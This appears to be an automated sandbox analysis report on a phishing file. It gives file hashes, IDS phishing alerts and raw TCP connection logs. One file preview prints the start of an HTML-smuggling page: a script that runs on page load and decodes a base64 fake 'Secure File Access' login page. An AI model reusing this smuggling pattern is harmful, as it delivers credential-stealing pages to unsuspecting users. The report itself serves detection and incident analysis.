                                    Preview:<!DOCTYPE html>.<html>.<head>. <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>. <script>. $(document).ready(function() {. saveFile();. });.. function saveFile(name, type, data) {. if (data != null && navigator.msSaveBlob). return navigator.msSaveBlob(new Blob([data], { type: type }), name);. var a = $("<a style='display: none;'/>");. . var encodedStringAtoB = "PCFET0NUWVBFIGh0bWw+CjxodG1sIGxhbmc9ImVuIj4KPGhlYWQ+CiAgICA8bWV0YSBjaGFyc2V0PSJVVEYtOCI+CiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEuMCI+CiAgICA8dGl0bGU+U2VjdXJlIEZpbGUgQWNjZXNzPC90aXRsZT4KICAgIDxzdHlsZT4KICAgICAgICBib2R5IHsKICAgICAgICAgICAgbWFyZ2luOiAwOwogICAgICAgICAgICBwYWRkaW5nOiAwOwogICAgICAgICAgICBmb250LWZhbWlseTogJ1NlZ29lIFVJJywgVGFob21hLCBHZW5ldmEsIFZlcmRhbmEsIHNhbnMtc2VyaWY7CiAgICAgICAgICAgIGJhY2tncm91bmQtY29sb3I6ICNmM2YyZjE7CiAgICAgICAgICAgIGRpc3BsYXk6IGZsZXg7CiAgICAgICAgICAgIGp1c3RpZnktY29udGVudDogY2VudGVyOwogIC
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (65447)
                                    Category:dropped
                                    Size (bytes):89501
                                    Entropy (8bit):5.289893677458563
                                    Encrypted:false
                                    SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                    MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                    SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                    SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                    SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                    Malicious:false
                                    Reputation:low
                                    Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:SVG Scalable Vector Graphics image
                                    Category:dropped
                                    Size (bytes):272
                                    Entropy (8bit):4.825230707379318
                                    Encrypted:false
                                    SSDEEP:6:tI9mc4sl3u7Ee/Uw4tzC/CHftwHK32KHzCF3cHoKgwHKY:t41uwPwge/CHFyKGKHeVpyKY
                                    MD5:363FDD53D34303B727D9DAB161B8E88B
                                    SHA1:5B170117926AE5A5E451AA24676B5A124C2FA122
                                    SHA-256:3D41251F93127B4B42C2F69FA423D204946CF9C307D786EA36B8D9BEF4179282
                                    SHA-512:6369E9E3B0F49D5BE6C43724C01D34E7B9871E9D709C628ED0963B94183729AABB2D9778EED4405D87C5080DEA19156970DAB6B8D69EDB860ADC5C1A400FAFB3
                                    Malicious:false
                                    Reputation:low
                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 23 23"><path fill="#f3f3f3" d="M0 0h23v23H0z"/><path fill="#f35325" d="M1 1h10v10H1z"/><path fill="#81bc06" d="M12 1h10v10H12z"/><path fill="#05a6f0" d="M1 12h10v10H1z"/><path fill="#ffba08" d="M12 12h10v10H12z"/></svg>
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (65447)
                                    Category:downloaded
                                    Size (bytes):89501
                                    Entropy (8bit):5.289893677458563
                                    Encrypted:false
                                    SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                    MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                    SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                    SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                    SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                    Malicious:false
                                    Reputation:low
                                    URL:https://code.jquery.com/jquery-3.6.0.min.js
                                    Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:SVG Scalable Vector Graphics image
                                    Category:downloaded
                                    Size (bytes):5094
                                    Entropy (8bit):4.834039771497343
                                    Encrypted:false
                                    SSDEEP:96:5NfSH5pziTJNziTzJgaH+PRpJM+GKq4MsB4Hz7oG9fpdOiXlj8Hdaus:jo+TSTFgaePjC+GKx4T7okHONaus
                                    MD5:A8FEAF8EA80C17228A67DFEB1E251D8F
                                    SHA1:38A4598BA356C8E43E6A6EA2E59587AB76D26A05
                                    SHA-256:35F933EFDC4AC3426775ABF70B002C39D5A9D98B343A11E44A21EB3D0C952FD3
                                    SHA-512:0E969BAB0E5338E0EEC990D39A01D13BB88A687EF4986FC1407C2416014179A4D15BDD61074441014487E4E978D1025FE9B6A1D16BFDE3CD706B0F6073C6C094
                                    Malicious:false
                                    Reputation:low
                                    URL:https://upload.wikimedia.org/wikipedia/commons/8/87/PDF_file_icon.svg
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>.<svg xmlns="http://www.w3.org/2000/svg" width="75.320129mm" height="92.604164mm" viewBox="0 0 75.320129 92.604164">. <g transform="translate(53.548057 -183.975276) scale(1.4843)">. <path fill="#ff2116" d="M-29.632812 123.94727c-3.551967 0-6.44336 2.89347-6.44336 6.44531v49.49804c0 3.55185 2.891393 6.44532 6.44336 6.44532H8.2167969c3.5519661 0 6.4433591-2.89335 6.4433591-6.44532v-40.70117s.101353-1.19181-.416015-2.35156c-.484969-1.08711-1.275391-1.84375-1.275391-1.84375a1.0584391 1.0584391 0 0 0-.0059-.008l-9.3906254-9.21094a1.0584391 1.0584391 0 0 0-.015625-.0156s-.8017392-.76344-1.9902344-1.27344c-1.39939552-.6005-2.8417968-.53711-2.8417968-.53711l.021484-.002z" color="#000" font-family="sans-serif" overflow="visible" paint-order="markers fill stroke" style="line-height:normal;font-variant-ligatures:normal;font-variant-position:normal;font-variant-caps:normal;font-variant-numeric:normal;font-variant-alternates:normal;font-feat
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:SVG Scalable Vector Graphics image
                                    Category:downloaded
                                    Size (bytes):272
                                    Entropy (8bit):4.825230707379318
                                    Encrypted:false
                                    SSDEEP:6:tI9mc4sl3u7Ee/Uw4tzC/CHftwHK32KHzCF3cHoKgwHKY:t41uwPwge/CHFyKGKHeVpyKY
                                    MD5:363FDD53D34303B727D9DAB161B8E88B
                                    SHA1:5B170117926AE5A5E451AA24676B5A124C2FA122
                                    SHA-256:3D41251F93127B4B42C2F69FA423D204946CF9C307D786EA36B8D9BEF4179282
                                    SHA-512:6369E9E3B0F49D5BE6C43724C01D34E7B9871E9D709C628ED0963B94183729AABB2D9778EED4405D87C5080DEA19156970DAB6B8D69EDB860ADC5C1A400FAFB3
                                    Malicious:false
                                    Reputation:low
                                    URL:https://upload.wikimedia.org/wikipedia/commons/4/44/Microsoft_logo.svg
                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 23 23"><path fill="#f3f3f3" d="M0 0h23v23H0z"/><path fill="#f35325" d="M1 1h10v10H1z"/><path fill="#81bc06" d="M12 1h10v10H12z"/><path fill="#05a6f0" d="M1 12h10v10H1z"/><path fill="#ffba08" d="M12 12h10v10H12z"/></svg>
                                    No static file info
                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2024-11-27T23:06:45.244863+01002858017ETPRO PHISHING HTML Smuggling Credential Phish Landing Page 2024-08-231172.67.157.254443192.168.2.1649719TCP
                                    2024-11-27T23:07:48.269538+01002812237ETPRO PHISHING Possible Successful Generic Phish July 281192.168.2.1649739172.67.157.254443TCP
                                    2024-11-27T23:08:01.875708+01002812237ETPRO PHISHING Possible Successful Generic Phish July 281192.168.2.1649741172.67.157.254443TCP
                                    2024-11-27T23:08:31.310693+01002812237ETPRO PHISHING Possible Successful Generic Phish July 281192.168.2.1649744172.67.157.254443TCP
                                    TimestampSource PortDest PortSource IPDest IP
                                    Nov 27, 2024 23:06:30.504636049 CET4434969820.190.147.3192.168.2.16
                                    Nov 27, 2024 23:06:30.504661083 CET4434969820.190.147.3192.168.2.16
                                    Nov 27, 2024 23:06:30.504756927 CET4434969820.190.147.3192.168.2.16
                                    Nov 27, 2024 23:06:30.504832029 CET4434969820.190.147.3192.168.2.16
                                    Nov 27, 2024 23:06:30.504868031 CET4434969820.190.147.3192.168.2.16
                                    Nov 27, 2024 23:06:30.854754925 CET8049699199.232.214.172192.168.2.16
                                    Nov 27, 2024 23:06:30.854823112 CET8049699199.232.214.172192.168.2.16
                                    Nov 27, 2024 23:06:30.854877949 CET4969980192.168.2.16199.232.214.172
                                    Nov 27, 2024 23:06:30.854965925 CET8049699199.232.214.172192.168.2.16
                                    Nov 27, 2024 23:06:30.854978085 CET8049699199.232.214.172192.168.2.16
                                    Nov 27, 2024 23:06:30.854990959 CET8049699199.232.214.172192.168.2.16
                                    Nov 27, 2024 23:06:30.855026007 CET4969980192.168.2.16199.232.214.172
                                    Nov 27, 2024 23:06:30.855247974 CET8049699199.232.214.172192.168.2.16
                                    Nov 27, 2024 23:06:30.855268002 CET8049699199.232.214.172192.168.2.16
                                    Nov 27, 2024 23:06:30.855278969 CET8049699199.232.214.172192.168.2.16
                                    Nov 27, 2024 23:06:30.855297089 CET4969980192.168.2.16199.232.214.172
                                    Nov 27, 2024 23:06:30.855325937 CET4969980192.168.2.16199.232.214.172
                                    Nov 27, 2024 23:06:31.023471117 CET4434969820.190.147.3192.168.2.16
                                    Nov 27, 2024 23:06:31.023636103 CET4434969820.190.147.3192.168.2.16
                                    Nov 27, 2024 23:06:31.023647070 CET4434969820.190.147.3192.168.2.16
                                    Nov 27, 2024 23:06:31.023695946 CET49698443192.168.2.1620.190.147.3
                                    Nov 27, 2024 23:06:31.023938894 CET4434969820.190.147.3192.168.2.16
                                    Nov 27, 2024 23:06:31.023993015 CET49698443192.168.2.1620.190.147.3
                                    Nov 27, 2024 23:06:31.147900105 CET4434969820.190.147.3192.168.2.16
                                    Nov 27, 2024 23:06:31.147912025 CET4434969820.190.147.3192.168.2.16
                                    Nov 27, 2024 23:06:31.147988081 CET49698443192.168.2.1620.190.147.3
                                    Nov 27, 2024 23:06:31.148216009 CET4434969820.190.147.3192.168.2.16
                                    Nov 27, 2024 23:06:31.148226976 CET4434969820.190.147.3192.168.2.16
                                    Nov 27, 2024 23:06:31.148273945 CET49698443192.168.2.1620.190.147.3
                                    Nov 27, 2024 23:06:31.272320032 CET4434969820.190.147.3192.168.2.16
                                    Nov 27, 2024 23:06:31.272336006 CET4434969820.190.147.3192.168.2.16
                                    Nov 27, 2024 23:06:31.272413969 CET49698443192.168.2.1620.190.147.3
                                    Nov 27, 2024 23:06:36.418071985 CET49705443192.168.2.16162.159.140.229
                                    Nov 27, 2024 23:06:36.418102026 CET44349705162.159.140.229192.168.2.16
                                    Nov 27, 2024 23:06:36.418173075 CET49705443192.168.2.16162.159.140.229
                                    Nov 27, 2024 23:06:36.418730974 CET49706443192.168.2.16162.159.140.229
                                    Nov 27, 2024 23:06:36.418793917 CET44349706162.159.140.229192.168.2.16
                                    Nov 27, 2024 23:06:36.418898106 CET49706443192.168.2.16162.159.140.229
                                    Nov 27, 2024 23:06:36.418941975 CET49705443192.168.2.16162.159.140.229
                                    Nov 27, 2024 23:06:36.418953896 CET44349705162.159.140.229192.168.2.16
                                    Nov 27, 2024 23:06:36.419186115 CET49706443192.168.2.16162.159.140.229
                                    Nov 27, 2024 23:06:36.419204950 CET44349706162.159.140.229192.168.2.16
                                    Nov 27, 2024 23:06:36.676040888 CET49673443192.168.2.16204.79.197.203
                                    Nov 27, 2024 23:06:36.988760948 CET49673443192.168.2.16204.79.197.203
                                    Nov 27, 2024 23:06:37.599764109 CET49673443192.168.2.16204.79.197.203
                                    Nov 27, 2024 23:06:37.686402082 CET44349705162.159.140.229192.168.2.16
                                    Nov 27, 2024 23:06:37.686671019 CET49705443192.168.2.16162.159.140.229
                                    Nov 27, 2024 23:06:37.686682940 CET44349705162.159.140.229192.168.2.16
                                    Nov 27, 2024 23:06:37.687596083 CET44349705162.159.140.229192.168.2.16
                                    Nov 27, 2024 23:06:37.687658072 CET49705443192.168.2.16162.159.140.229
                                    Nov 27, 2024 23:06:37.688596964 CET49705443192.168.2.16162.159.140.229
                                    Nov 27, 2024 23:06:37.688651085 CET44349705162.159.140.229192.168.2.16
                                    Nov 27, 2024 23:06:37.688785076 CET49705443192.168.2.16162.159.140.229
                                    Nov 27, 2024 23:06:37.688791037 CET44349705162.159.140.229192.168.2.16
                                    Nov 27, 2024 23:06:37.728810072 CET44349706162.159.140.229192.168.2.16
                                    Nov 27, 2024 23:06:37.729049921 CET49706443192.168.2.16162.159.140.229
                                    Nov 27, 2024 23:06:37.729079008 CET44349706162.159.140.229192.168.2.16
                                    Nov 27, 2024 23:06:37.729942083 CET44349706162.159.140.229192.168.2.16
                                    Nov 27, 2024 23:06:37.730005980 CET49706443192.168.2.16162.159.140.229
                                    Nov 27, 2024 23:06:37.730307102 CET49706443192.168.2.16162.159.140.229
                                    Nov 27, 2024 23:06:37.730362892 CET44349706162.159.140.229192.168.2.16
                                    Nov 27, 2024 23:06:37.741750002 CET49705443192.168.2.16162.159.140.229
                                    Nov 27, 2024 23:06:37.773780107 CET49706443192.168.2.16162.159.140.229
                                    Nov 27, 2024 23:06:37.773804903 CET44349706162.159.140.229192.168.2.16
                                    Nov 27, 2024 23:06:37.821760893 CET49706443192.168.2.16162.159.140.229
                                    Nov 27, 2024 23:06:38.361783981 CET44349705162.159.140.229192.168.2.16
                                    Nov 27, 2024 23:06:38.361867905 CET44349705162.159.140.229192.168.2.16
                                    Nov 27, 2024 23:06:38.361932039 CET49705443192.168.2.16162.159.140.229
                                    Nov 27, 2024 23:06:38.362797976 CET49705443192.168.2.16162.159.140.229
                                    Nov 27, 2024 23:06:38.362812042 CET44349705162.159.140.229192.168.2.16
                                    Nov 27, 2024 23:06:38.736233950 CET49709443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:38.736255884 CET44349709172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:38.736325026 CET49709443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:38.736632109 CET49710443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:38.736665010 CET44349710172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:38.736751080 CET49710443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:38.736932993 CET49709443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:38.736944914 CET44349709172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:38.737123013 CET49710443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:38.737142086 CET44349710172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:38.805766106 CET49673443192.168.2.16204.79.197.203
                                    Nov 27, 2024 23:06:40.004934072 CET44349709172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:40.005286932 CET49709443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:40.005315065 CET44349709172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:40.006372929 CET44349709172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:40.006454945 CET49709443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:40.007401943 CET49709443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:40.007442951 CET49709443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:40.007469893 CET44349709172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:40.007522106 CET49709443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:40.007535934 CET44349709172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:40.007545948 CET49709443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:40.007584095 CET49709443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:40.007872105 CET49711443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:40.007894039 CET44349711172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:40.007966995 CET49711443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:40.008161068 CET49711443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:40.008173943 CET44349711172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:40.047389984 CET44349710172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:40.047693014 CET49710443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:40.047727108 CET44349710172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:40.048603058 CET44349710172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:40.048676968 CET49710443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:40.048943043 CET49710443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:40.048955917 CET49710443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:40.048999071 CET44349710172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:40.049002886 CET49710443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:40.049052954 CET49710443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:40.049293995 CET49712443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:40.049333096 CET44349712172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:40.049417019 CET49712443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:40.049604893 CET49712443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:40.049622059 CET44349712172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:40.312289953 CET49713443192.168.2.16142.250.181.68
                                    Nov 27, 2024 23:06:40.312323093 CET44349713142.250.181.68192.168.2.16
                                    Nov 27, 2024 23:06:40.312392950 CET49713443192.168.2.16142.250.181.68
                                    Nov 27, 2024 23:06:40.312592983 CET49713443192.168.2.16142.250.181.68
                                    Nov 27, 2024 23:06:40.312603951 CET44349713142.250.181.68192.168.2.16
                                    Nov 27, 2024 23:06:41.208786964 CET49673443192.168.2.16204.79.197.203
                                    Nov 27, 2024 23:06:41.275620937 CET44349712172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:41.276164055 CET49712443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:41.276180983 CET44349712172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:41.277318001 CET44349712172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:41.277414083 CET49712443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:41.278532028 CET49712443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:41.278620958 CET44349712172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:41.278748035 CET49712443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:41.278753996 CET44349712172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:41.292872906 CET4968980192.168.2.16192.229.211.108
                                    Nov 27, 2024 23:06:41.319816113 CET44349711172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:41.320086002 CET49711443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:41.320111036 CET44349711172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:41.320748091 CET49712443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:41.321124077 CET44349711172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:41.321191072 CET49711443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:41.321917057 CET49711443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:41.321983099 CET44349711172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:41.368784904 CET49711443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:41.368808031 CET44349711172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:41.416775942 CET49711443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:41.883018970 CET44349712172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:41.883095980 CET44349712172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:41.883117914 CET44349712172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:41.883140087 CET44349712172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:41.883162022 CET44349712172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:41.883188009 CET49712443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:41.883200884 CET44349712172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:41.883209944 CET44349712172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:41.883234024 CET49712443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:41.883254051 CET49712443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:41.891381025 CET44349712172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:41.891459942 CET44349712172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:41.891547918 CET49712443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:41.891712904 CET49712443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:41.891727924 CET44349712172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:41.929683924 CET49711443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:41.930691004 CET49715443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:41.930746078 CET44349715172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:41.931361914 CET49715443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:41.931680918 CET49715443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:41.931694031 CET44349715172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:41.975337029 CET44349711172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:42.030575991 CET49716443192.168.2.1635.190.80.1
                                    Nov 27, 2024 23:06:42.030637980 CET4434971635.190.80.1192.168.2.16
                                    Nov 27, 2024 23:06:42.030760050 CET49716443192.168.2.1635.190.80.1
                                    Nov 27, 2024 23:06:42.030963898 CET49716443192.168.2.1635.190.80.1
                                    Nov 27, 2024 23:06:42.030982971 CET4434971635.190.80.1192.168.2.16
                                    Nov 27, 2024 23:06:42.574785948 CET44349711172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:42.574908972 CET44349711172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:42.575063944 CET49711443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:42.575464964 CET49711443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:42.575479031 CET44349711172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:42.580495119 CET49717443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:42.580528021 CET44349717172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:42.580604076 CET49717443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:42.581062078 CET49717443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:42.581075907 CET44349717172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:42.625590086 CET44349713142.250.181.68192.168.2.16
                                    Nov 27, 2024 23:06:42.625833988 CET49713443192.168.2.16142.250.181.68
                                    Nov 27, 2024 23:06:42.625844002 CET44349713142.250.181.68192.168.2.16
                                    Nov 27, 2024 23:06:42.626709938 CET44349713142.250.181.68192.168.2.16
                                    Nov 27, 2024 23:06:42.626862049 CET49713443192.168.2.16142.250.181.68
                                    Nov 27, 2024 23:06:42.627585888 CET49713443192.168.2.16142.250.181.68
                                    Nov 27, 2024 23:06:42.627638102 CET44349713142.250.181.68192.168.2.16
                                    Nov 27, 2024 23:06:42.676808119 CET49713443192.168.2.16142.250.181.68
                                    Nov 27, 2024 23:06:42.676835060 CET44349713142.250.181.68192.168.2.16
                                    Nov 27, 2024 23:06:42.724881887 CET49713443192.168.2.16142.250.181.68
                                    Nov 27, 2024 23:06:43.023366928 CET49718443192.168.2.1623.218.208.109
                                    Nov 27, 2024 23:06:43.023407936 CET4434971823.218.208.109192.168.2.16
                                    Nov 27, 2024 23:06:43.023590088 CET49718443192.168.2.1623.218.208.109
                                    Nov 27, 2024 23:06:43.025491953 CET49718443192.168.2.1623.218.208.109
                                    Nov 27, 2024 23:06:43.025509119 CET4434971823.218.208.109192.168.2.16
                                    Nov 27, 2024 23:06:43.197076082 CET44349715172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:43.197348118 CET49715443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:43.197366953 CET44349715172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:43.198237896 CET44349715172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:43.198303938 CET49715443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:43.198580027 CET49715443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:43.198595047 CET49715443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:43.198637009 CET44349715172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:43.198642015 CET49715443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:43.198690891 CET49715443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:43.198937893 CET49719443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:43.198986053 CET44349719172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:43.199070930 CET49719443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:43.199326038 CET49719443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:06:43.199337006 CET44349719172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:06:43.297935963 CET4434971635.190.80.1192.168.2.16
                                    Nov 27, 2024 23:06:43.298394918 CET49716443192.168.2.1635.190.80.1
                                    Nov 27, 2024 23:06:43.298433065 CET4434971635.190.80.1192.168.2.16
                                    Nov 27, 2024 23:06:43.299288988 CET4434971635.190.80.1192.168.2.16
                                    Nov 27, 2024 23:06:43.299369097 CET49716443192.168.2.1635.190.80.1
                                    Nov 27, 2024 23:06:43.300252914 CET49716443192.168.2.1635.190.80.1
                                    Nov 27, 2024 23:06:43.300313950 CET4434971635.190.80.1192.168.2.16
                                    Nov 27, 2024 23:06:43.300411940 CET49716443192.168.2.1635.190.80.1
                                    Nov 27, 2024 23:06:43.300424099 CET4434971635.190.80.1192.168.2.16
                                    Nov 27, 2024 23:06:43.348745108 CET49716443192.168.2.1635.190.80.1
                                    Nov 27, 2024 23:06:43.771666050 CET4434971635.190.80.1192.168.2.16
                                    Nov 27, 2024 23:06:43.771734953 CET4434971635.190.80.1192.168.2.16
                                    Nov 27, 2024 23:06:43.771790028 CET49716443192.168.2.1635.190.80.1
                                    Nov 27, 2024 23:06:43.772054911 CET49716443192.168.2.1635.190.80.1
                                    Nov 27, 2024 23:06:43.772077084 CET4434971635.190.80.1192.168.2.16
                                    Nov 27, 2024 23:06:43.772586107 CET49720443192.168.2.1635.190.80.1
                                    Nov 27, 2024 23:06:43.772619963 CET4434972035.190.80.1192.168.2.16
                                    Nov 27, 2024 23:06:43.772695065 CET49720443192.168.2.1635.190.80.1
                                    Nov 27, 2024 23:06:43.772912979 CET49720443192.168.2.1635.190.80.1
